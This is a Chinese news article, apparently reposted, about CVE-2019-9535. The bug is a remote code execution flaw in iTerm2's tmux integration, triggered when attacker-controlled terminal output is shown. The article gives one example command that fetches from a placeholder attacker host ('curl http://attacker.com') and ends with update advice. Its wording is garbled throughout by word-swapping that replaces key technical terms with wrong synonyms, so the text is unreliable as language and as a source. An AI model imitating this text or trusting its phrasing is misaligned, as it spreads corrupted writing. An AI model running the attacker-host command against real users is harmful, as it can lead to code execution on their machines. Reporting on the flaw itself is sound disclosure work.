Mac终端利器 iTerm2被曝严重的RCE漏洞，至少已存在7年（含PoC视频）

由Mozilla开源撑持规划(MOSS)匡助、收集安然公司Radically Open Security(ROS)开展的一次自力安然审计事实浮现，iTerm 2 中存在一个严重的远程代码执行(RCE)马脚，且至少已存在7年。

[转载出处：www.11jj.com]

iTerm 2 简介

iTerm2是全球最热点的终端模拟器之一，是斥地人员经常使用的MacOS 终端对象，是Mac内置终端app最有力的热点开源对象替代品之一，被多少斥地人员称为“Mac 终端利器”。

MOSS 规划选择iTerm2进行安然审计的原因在于它处理不受信任的数据且其使用局限遍及，用户包括高风险方针如斥地人员和系统治理员。

马脚概述

该马脚的CVE编号是CVE-2019-9535。

在审计过程中，ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重马脚。冲击者如能生成终端输出，则在多少景遇下能够在用户角力机上执行呼吁。这种冲击向量的例子是连结到由冲击者把握的 SSH 处事器或许呼吁如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

斥地人员George Nachman指出，“审计发现某个问题在收到必然的输入后会导致iTerm2发出呼吁。这个问题非常严重，因为在某些景遇下，当用户检察文件或许领受在iTerm2组织的输入时，冲击者就能够在用户机械上执行代码。”

Nachman认为该马脚影响的iTerm2用户数量介于10万至20万之间。

Mozilla公司的安然工程师Tom Ritter指出，这个马脚源自iTerm2中的 tmux集成功能。Tumx应用轨范是一款终端多路复用器，可许可从单个设备竖立并把握多个终端。

CERT协调中心发布马脚通知透露，可经由使用呼吁行对象在终端屏幕上打印由冲击者把握的内容，从而行使该马脚。该中心指出，“潜在的冲击向量包括经由ssh连结至恶意处事器，经由curl 获取恶意网站，或许经由tail –f跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机械连结到恶意SSH处事器之后，在机械上执行呼吁的 PoC视频。在这个案例中，只打开一个角力器作为此外更具恶意的呼吁的占位符。

一般景遇下，该马脚需要某些用户交互或手法才能遭触发，但因为它可经由常日被认为是安然的呼吁行使，是以它的潜在影响力伟大。

影响版本

该马脚影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

今朝补丁已发布但自动更新尚未推送，建议用户马上在iTerm2目录中选择“搜检新版本”手动更新至最新版本3.3.6。

*参考起原：Mozilla、TheRegister，由代码卫士编译，转载请注明来自FreeBuf.COM

超卓介绍